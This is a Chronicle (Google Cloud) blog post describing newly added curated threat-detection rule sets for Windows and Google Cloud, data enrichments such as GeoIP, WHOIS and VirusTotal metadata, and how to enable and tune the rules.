Security Operations Platform arrow_forward expand_more
Solutions arrow_forward expand_more
Why Chronicle arrow_forward expand_more
Why Chronicle

Rely on a modern approach to threat detection and response.

Why Chronicle
Resources arrow_forward expand_more
Security Operations Platform arrow_forward expand_more
Solutions arrow_forward expand_more
Why Chronicle arrow_forward expand_more
Why Chronicle

Rely on a modern approach to threat detection and response.

Why Chronicle
Resources arrow_forward expand_more
Mandiant is now part of Google Cloud. Learn More Mandiant is now part of Google Cloud. .
A Look Back at Curated Detections

Chronicle's Curated Detections is a powerful capability that can help you identify and respond to security threats. In August 2022, we released our initial set of curated detections to identify a variety of threats facing our customers.

If you have yet to explore the curated content provided, Curated Detections are a collection of rules grouped together to cover specific threats. Since the initial release, we have continued to develop new rule sets to cover even more threats and have introduced a set of new powerful features to enable customers to build their own detections. In this post, we will discuss some of the new detections we have added since the initial launch.

New Curated Detections 

The following new curated detection rule sets are available:

Windows Centric:

  • Anomalous-Powershell - Detects PowerShell commands containing obfuscation techniques or other anomalous behavior.

  • Security-Downgrade - Detects behavior that impairs or disables common security tooling or detection capabilities.

  • Living-off-the-Land - Detects anomalous usage of tools native to Windows operating systems that can be abused by threat actors for malicious purposes.

Google Cloud Centric:

  • Admin-Action - Activity associated with Google Cloud administrative actions, deemed suspicious but potentially legitimate depending on organizational use.

  • IAM-abuse - Activity associated with suspicious Google Cloud IAM permissions or roles.

  • Resource-Masquerading - Activity masqueraded to appear as legitimate default resources or services in Google Cloud.

  • Suspicious-Infrastructure-Change - Activity involving modifications of infrastructure in Google Cloud.

  • Suspicious-Behavior - Activity that could be considered suspicious in some Google Cloud environments.

  • Service-Disruption - Activity that may indicate a Google Cloud service disruption has occurred.

  • Hacktools - Activity associated with known Offensive Security frameworks and/or Google Cloud-oriented hacktools.

  • Cloud SQL Ransom - Activity associated with threat actors ransoming Google Cloud SQL assets.

New IOC Enrichment within Chronicle

Additionally, we’ve been working at providing data enrichment to make customer generated content more actionable. Previously, customers would have to normalize, enrich, and post-process this data on their own. With built-in enrichments in entity and event data, we have the ability to provide security teams easier ways to build powerful and actionable alerting at the detection level, opening up the possibilities for powerful alert creation to amplify or dampen relevant threat detection signals. Some examples of enrichments we have developed include:

  • GeoIP - Leverage country, state, ASN, Carrier name, DNS and Organization name in your alerting.

  • Safe Browsing - Leverage Google’s Safe Browsing’s reputation service to help determine if a file is malicious.

  • WHOIS - Add whois data to your alerting to find potential phishing or masquerading domains. 

  • Google Cloud Threat Intelligence (GCTI) - Leverage Google’s threat intelligence to find TOR exit nodes, or identify benign binaries that Google has deemed as benign.

  • VirusTotal Metadata and Relationship Metadata - Leverage VirusTotal metadata that includes file compilation timestamps, digital signatures, entropy, and extracted network indicators (to name just a few fields available).  

How to use Curated Content

To enable Curated Detections, Chronicle offers a set of quick actions that will set up recommended rule settings. Alternatively, you can go into each rule pack and configure each set. This is all available in the Curated Detections tab under Rules.

When you click on a rule set you have settings for both precise and broad rules. Precise rules find malicious behavior with a high degree of confidence, with fewer false positives. Broad rules find behavior that could potentially be malicious or anomalous, but with typically more false positives.

Alerting can be switched on precise, broad, both or neither. Alerting will place the event in queue for an analyst where just activating the rule allows it to be run in the background and where the results can be analyzed and tuned using exclusions prior to adding it to your security operations processes. 

To view the performance of curated detections, click on Dashboard to view the rules that have fired and modify as needed.

What’s Next?

We are planning to continue to provide a quarterly update featuring some of the exciting work the Google Cloud Threat Intelligence (GCTI) team has been building into Curated Detections. We are also excited to be partnering with Mandiant on an upcoming rule set targeting the frontline threats observed by Mandiant.  We’re also working on more enrichments including a remote access tooling feed to identify remote access tools operating in customer environments to give customers the ability to alert or exclude any remote access tooling they are observing in their environments.

Threat Detection

Let’s work together

Ready for Google-speed threat detection and response?

Contact us Visit the contact us page